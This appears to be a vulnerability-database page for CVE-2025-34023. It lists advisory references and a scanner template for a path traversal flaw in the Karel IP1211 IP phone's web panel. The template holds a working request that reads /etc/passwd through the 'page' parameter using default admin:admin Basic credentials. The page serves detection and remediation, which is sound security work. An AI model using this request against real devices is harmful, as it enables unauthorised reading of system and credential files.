| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-34023 | 20 Jun 202522:14 | – | circl | |
| Karel IP1211 IP Phone 安全漏洞 | 20 Jun 202500:00 | – | cnnvd | |
| CVE-2025-34023 | 20 Jun 202518:37 | – | cve | |
| CVE-2025-34023 Karel IP Phone IP1211 Path Traversal | 20 Jun 202518:37 | – | cvelist | |
| EUVD-2025-18777 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-34023 | 20 Jun 202519:15 | – | nvd | |
| PT-2025-26459 · Karel · Karel Ip1211 Ip Phone | 20 Jun 202500:00 | – | ptsecurity | |
| CVE-2025-34023 | 23 Jun 202508:39 | – | redhatcve | |
| VulnCheck KEV: CVE-2025-34023 | 20 Jun 202500:00 | – | vulncheck_kev | |
| CVE-2025-34023 Karel IP Phone IP1211 Path Traversal | 20 Jun 202518:37 | – | vulnrichment |
id: CVE-2025-34023
info:
name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
author: 0x_Akoko
severity: high
description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
impact: |
Attackers can read arbitrary files including sensitive configuration and credential files stored on the device through path traversal in the page parameter.
remediation: |
Update Karel IP Phone IP1211 firmware to the latest version that properly validates file paths, or restrict access to the cgiServer.exx endpoint.
reference:
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
- https://nvd.nist.gov/vuln/detail/CVE-2025-34023
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-34023
epss-score: 0.01409
epss-percentile: 0.69384
cwe-id: CWE-22
metadata:
max-request: 1
tags: cve,cve2025,karel,lfi,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
headers:
Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100fae0dfff23073d2880f973d0daf748295060bc0288425ac245ec2fe8fae7351c02207693f5700d0b00e16d496c041a7a04a9f2332e6235745387402c0fdebec25ff5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation